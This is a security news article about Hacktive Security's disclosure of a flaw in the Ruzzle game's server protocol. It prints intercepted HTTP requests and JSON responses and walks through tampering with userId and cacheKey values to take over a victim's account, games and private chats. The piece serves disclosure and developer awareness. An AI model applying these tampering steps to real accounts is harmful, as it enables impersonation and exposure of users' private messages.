Hacktive Security discoveries flaw in Ruzzle protocol that menaces user’s privacy

Pierluigi Paganini April 02, 2013

Researchers at Hacktive Security, an independent security consulting company, have demonstrated how much insidious could be a so a simple and crimeless large scale application.

We are in the digital era, everything is connected to the large networks and applications benefit of even more complex devices that deeply interact with the owner, in this scenario security requirements assume a crucial importance and security of overall architecture also depend on security of single components.

In these months mobile users have gone crazy for a simple video game, inspired by the board games Boggle and Scrabble, named Ruzzle, developed by the Swedish gaming company MAG Interactive, available for iOS and Android devices.

Early 2013 the researcher at Hacktive Security started a study on most popular mobile applications such as popular Ruzzle focusing on the protocol implemented and possible repercussion on user’s privacy.

Ruzzle protocol uses Json for response within a user’s session, security analysts discovered that is it possible to tamper it due the absence of control on the server side on data sent by the application.  The leak of data validation is widely exploited in a web application context typically to increase attacker’s privileges or worst to impersonate the victim within an authenticated session.

The research conducted demonstrated that it is possible to obtain access with a profile different from the one of the victims without authentication performing actions exactly as the attacked user.

One of the most interesting components of the Ruzzle game is the chat, today the key feature of any game is its social aspect, its capability to make in direct contact users simply play a game or exchange messages. Ruzzle doesn’t escape to this simple rule, experts at Hacktive Security demonstrated that an ill-intentioned user can obtain full control of the victim’s account with serious repercussion.

RuzzleGame

The attackers can access to the whole list of played games including current games and it could also challenge other victim’s friends … but the most concerning thing is that the attacker could access to victim’s private messages exchanged with other users via internal chat feature and it could impersonate the victim in other chat conversations.

Following the evidences provided by the team of analysts in their blog post:

Opening Ruzzle on a mobile device, the app performs the login process through a request using a classic HTTP POST method:

POST /api/user/login HTTP/1.1
Host: davincigameserver.appspot.com
Proxy-Connection: keep-alive
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
Content-Length: 222
Accept-Language: en-us
Accept: */*
Connection: keep-alive
User-Agent: Ruzzle/1.4.7 CFNetwork/609.1.4 Darwin/13.0.0

{“user“:”userId”:-1,”password”:”51452b9113ac704754f6878544d938c8b2f4edd3″, “useFacebookImage“:”false”,”avatarId:0,”deviceId“:”18:9E:BF:41:DD:65″, “username”:”******”},”locale”:”en_US”,”version”:”1.4.7″,”premium”:”false”}

the POST above is the request originated by the client, containing the right parameters submitted through the application (in our case the login process is performed through the integration with the Facebook authentication).”

A showed in the above statement all information related to a user’s identity is included in the json structure sent as a response, this data could be easily intercepted and manipulated, for example modifying the value of parameter userId used to identify the victim.

HTTP/1.1 200 OK
Content-Type: application/json
Date: Wed, 02 Jan 2013 08:37:33 GMT
Server: Google Frontend
Cache-Control: private
Content-Length: 257

{“applications”:[“1″,”4″],”avatarId”:”0″,”facebookId”:”*********”,”locale”:”en_US”,”matchesPlayed”:”0″, “premium”:”false”,”ranking”:”0″,”session”:”628CC4D9743CE8557FDD3D2D175AFFD5920642B3″, “useFacebookImage”:”true”,”userId”:”*********”,”username”:”*****”}

“To obtain the value of a userId is enough to intercept the regular traffic generated by Ruzzle while challenging the chosen victim. We proceeded in tampering the value of the userId parameter with the one assigned to our victim:”

{“applications”:[“1″,”4″],”avatarId”:”0″,”facebookId”:”*********”,”locale”:”en_US”,”matchesPlayed”:”0″, “premium”:”false”,”ranking”:”0″,”session”:”628CC4D9743CE8557FDD3D2D175AFFD5920642B3″, “useFacebookImage”:”true”,”userId”:”tamperedId“,”username”:”*****”}

Once done this, the last step is to tamper few other parameters inside of the refreshCache POST. The parameters that need to be tampered are the following cacheKey values:

  • listRequests_NNNNNNNNN
  • listInvites_NNNNNNNNN
  • listActiveGames_NNNNNNNNN
  • list_FinishedGames_NNNNNNNNN

The NNNNNNNNN represent the userId that in the POST originated by Ruzzle contains the legitimate value of the userId cached by the app. Submitting these cacheKey values tampered with the victim’s userId in the numeric part after the underscore is the final step. The json response to this POST indeed loads into the Ruzzle app all data about the victim’s account as briefly reported under.

HTTP/1.1 200 OK
Content-Type: application/json
Date: Wed, 13 Mar 2013 11:39:05 GMT
Server: Google Frontend
Cache-Control: private
Content-Length: 44369

[…]

{“gameId”:”3553712971150881448″,”persistedRound”:”false”,”player1Done”:”false”,”player1Score”:”0″, “player2Done”:”false”,”player2Score”:”0″,”round”:”1″,”seed1″:”1525374704″,”seed2″:”816673570″,”seed3″: “494846459”},{“gameId”:”3553712971150881448″,”persistedRound”:”false”,”player1Done”:”false”, “player1Score”:”0″,”player2Done”:”false”,”player2Score”:”0″,”round”:”2″,”seed1″:”1159880445″,”seed2″: “281586875”,”seed3″:”645812112″}],”state”:”1″,”type”:”0″},{“userId”:”0″,”cacheKey”:”readGame_3100519240091618999″,”cacheTimestamp”:”1363174744785″, “chatConversation”:{“userId”:”0″,”conversationId”:”1032368976″,”lastUpdated”:”1363164721741″, “messages”:[{“message”:”This is a private conversation“,”read”:”true”,”sender”:”*********”,”timeSent”: “1363162097326”},{“message”:”Are you sure? “,”read”:”true”,”sender”:”*********”,”timeSent“: “1363162140730”}]

[…]

At this point the attack is completed, Ruzzle client on the mobile device has access to the victim’s account including all information described above.

What is the lesson that Hacktive Security team has given us?

Different are the element of discussion starting from the study of the Italian team, first consideration is related to level of exposure of user due the his ordinary access to internet, also a simple application could be exploited by attackers that could violate our privacy. Be aware of which applications to use, and in which context, today high debated is the argument of BYOD, the improper use of applications in workspace could expose sensitive information of company with serious consequences.

The second consideration is related to the design of mobile application and the necessity to consider user’s security at first place, even if we are developing a video game. Mobile devices are powerful platforms and attackers could exploit them for various purposes, video game are principal vector of infection and could be used in a simple way to gather access to user’s devices.

The app world is increasing in impressive way pushed by the explosion of the mobile market, but we cannot forget that apps run also in other context, such as of appliances, due this reason I believe that software produced have to recognize and share a set of minimum requirements related to security … I hope that in the future is will be not so simple access to data managed by an application like Ruzzle.

Pierluigi Paganini

(Security Affairs – Security)



you might also like

leave a comment